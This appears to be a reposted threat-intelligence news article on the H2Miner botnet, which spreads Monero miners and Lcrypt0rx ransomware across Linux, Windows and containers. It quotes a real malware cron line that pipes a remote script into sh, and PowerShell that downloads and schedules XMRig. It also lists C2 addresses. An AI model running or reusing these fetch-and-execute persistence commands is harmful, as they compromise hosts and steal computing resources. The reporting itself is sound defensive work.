H2Miner Attacking Linux, Windows, and Containers to Mine Monero
The H2Miner botnet, first observed in late 2019, has resurfaced with an expanded arsenal that blurs the line between cryptojacking and ransomware.
The latest campaign leverages inexpensive virtual private servers (VPS) and a grab-bag of commodity malware to compromise Linux hosts, Windows workstations, and container workloads simultaneously.
By chaining cloud-aware shell scripts, cross-compiled binaries, and living-off-the-land commands, the operators pivot quickly from initial foothold to Monero mining—often before defenders notice the spike in CPU load.
Attacks begin with opportunistic exploitation of misconfigured services or vulnerable applications such as Apache ActiveMQ (CVE-2023-46604) and Log4Shell.
Once inside, the botnet deploys tailored loader scripts—ce.sh on Linux and 1.ps1 on Windows—that terminate competing miners, disable endpoint protection, and fetch the XMRig binary from 78.153.140.66. Containers are not spared: spr.sh scans Docker images and ejects Alibaba Cloud’s aegis agent before dropping Kinsing.
The same infrastructure hosts a Cobalt Strike team server at 47.97.113.36 and Bitbucket repositories that disguise payloads as “MicrosoftSoftware.exe,” illustrating a mature, multi-tier command-and-control (C2) design.
Fortinet analysts noted that a new VBScript ransomware, Lcrypt0rx, is now bundled alongside the miners.
.webp "H2Miner Attacking Linux, Windows, and Containers to Mine Monero 3")
Although its encryption routine is rudimentary—an 8,192-character XOR key stitched to a per-file salt, the script still overwrites the Master Boot Record and litters the system with decoy persistence hooks.
.webp "H2Miner Attacking Linux, Windows, and Containers to Mine Monero 4")
The overlap of wallets and hosting addresses suggests either collaboration with, or direct control by, H2Miner’s original crew.
.webp "H2Miner Attacking Linux, Windows, and Containers to Mine Monero 5")
This shows that how ce.sh implants a cron job that re-downloads itself every ten minutes:-
( crontab -l 2>/dev/null ;
echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -Besides this, it highlights the Windows counterpart, where 1.ps1 registers XMRig as a scheduled task:
$miner = "$env:TEMPsysupdate.exe"
Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner
schtasks /create /f /tn "Update service for Windows Service" `
/tr "$miner" /sc minute /mo 15 /rl highestInfection Mechanism and Persistence
H2Miner’s sticking power stems from its layered infection sequence. The initial shell scripts enumerate defensive processes, kill them with brutal regular expressions, and wipe audit trails by clearing shell history.
.webp "H2Miner Attacking Linux, Windows, and Containers to Mine Monero 6")
On Windows, Lcrypt0rx escalates via Shell.Application to relaunch itself with wscript.exe /elevated, then attempts to cement persistence by mis-writing its path into the Winlogon Shell and IFEO keys.
While that registry logic fails, the malware compensates by embedding six auxiliary scripts—from advapi32_ext.vbs, which loops through taskkill /f /im *av*.exe, to USB_bridge.vbs, a rudimentary autorun propagator.
Each helper is dropped with +h +s +r attributes and invoked under HKCUSoftwareMicrosoftWindowsCurrentVersionRun, ensuring at least one copy survives cleanup.
This belt-and-suspenders approach, coupled with frequent updater scripts like cpr.sh, lets the botnet respawn miners even after a partial eviction.
For defenders, that means endpoint remediation must include container images, scheduled tasks, cron entries, and rogue registry keys; otherwise, the Monero wallets—notably 4ASk4RhU…p8SahC—will continue siphoning stolen compute cycles long after the first alert is closed.
Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now
Source link
